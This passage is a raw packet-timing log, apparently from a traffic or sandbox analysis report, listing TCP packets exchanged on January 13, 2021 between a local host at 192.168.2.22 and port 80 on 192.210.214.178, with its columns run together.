                                                                                              Jan 13, 2021 13:17:23.220782995 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220797062 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220846891 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220864058 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220880032 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220909119 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220927954 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220944881 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220943928 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.220964909 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220982075 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220985889 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.220993042 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.220999002 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221008062 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221015930 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221031904 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221046925 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221066952 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221079111 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221086025 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221102953 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221118927 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221132994 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221133947 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221152067 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221168995 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221172094 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221184969 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221204042 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221220970 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221220970 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221236944 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221254110 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221254110 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221270084 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221286058 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221299887 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221302032 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221318007 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221337080 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221343040 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221355915 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221373081 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221388102 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221400976 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221416950 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221422911 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221434116 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221448898 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221466064 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.221466064 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221506119 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.221540928 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.224328041 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.390569925 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390631914 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390675068 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390712023 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390749931 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390767097 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.390788078 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390815020 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.390825987 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390836000 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.390866041 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390902042 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390944004 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.390949011 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390953064 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.390993118 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.390997887 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.391030073 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.391047001 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.391067982 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.391083956 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.391107082 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.391124964 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.391145945 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.391168118 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.391206026 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.391256094 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.394000053 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397449970 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397494078 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397531033 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397567034 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397586107 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397605896 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397639990 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397644997 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397651911 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397694111 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397702932 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397737980 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397747040 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397775888 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397795916 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397816896 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397831917 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397855997 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397866011 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397893906 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397902012 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.397926092 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397963047 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.397964001 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398001909 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398005009 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398040056 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398046017 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398073912 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398080111 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398118019 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398133039 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398169041 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398216963 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398256063 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398267984 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398279905 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398297071 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398343086 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398343086 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398369074 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398385048 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398412943 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398422956 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398458958 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398461103 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398493052 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398500919 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398540020 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398546934 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398576975 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398593903 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398616076 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398624897 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398663998 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398664951 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398705006 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398705959 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398740053 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398745060 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.398777962 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.398828983 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.400170088 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565431118 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565459013 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565475941 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565490961 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565506935 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565529108 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565547943 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565567970 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565586090 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565602064 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565625906 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565632105 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565644979 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565680027 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565694094 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565700054 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565706015 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565711021 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565715075 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565720081 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565759897 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565778971 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565795898 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565813065 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565834999 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565854073 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565872908 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565891027 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565907955 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565916061 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565923929 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565942049 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565957069 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565958977 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565980911 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.565992117 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.565999985 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.566029072 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.566063881 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.568186998 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.568774939 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.568798065 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.568816900 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.568835020 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.568851948 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.568866014 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.568872929 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.568897009 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.568913937 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.568936110 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.568955898 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573585033 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573607922 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573626995 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573645115 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573667049 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573678970 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573687077 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573704958 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573721886 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573724031 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573740005 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573740005 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573757887 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573761940 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573776960 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573790073 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573796034 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573810101 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573817015 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573831081 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573838949 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573857069 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573864937 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573872089 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573883057 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573889971 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573899984 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573911905 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573923111 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573934078 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573951006 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573951960 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573966980 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573972940 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.573983908 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.573992014 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574008942 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574008942 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574028015 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574028015 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574045897 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574059963 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574068069 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574086905 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574086905 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574103117 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574105024 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574121952 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574121952 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574141026 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574146986 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574158907 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574172020 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574177027 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574193954 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574198008 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574210882 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574219942 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574238062 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574239969 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574249029 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574258089 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.574274063 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.574295998 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.576719999 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740366936 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740417004 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740467072 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740509033 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740547895 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740586042 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740605116 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740629911 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740641117 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740647078 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740652084 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740667105 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740700006 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740705013 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740720987 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740742922 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740777969 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740791082 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740794897 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740833044 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740860939 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740870953 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740886927 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740910053 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740931988 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740951061 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.740957022 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.740989923 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741017103 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741029024 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741040945 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741067886 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741094112 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741115093 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741116047 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741158962 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741179943 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741195917 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741208076 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741235971 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741261005 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741274118 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741286993 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741311073 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741344929 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741348982 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741390944 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741410017 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741421938 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741471052 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741492987 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741518974 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741534948 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741560936 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741585016 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741600990 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741628885 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741638899 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741658926 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741677999 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741708040 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741715908 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.741724968 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.741755009 CET8049165192.210.214.178192.168.2.22
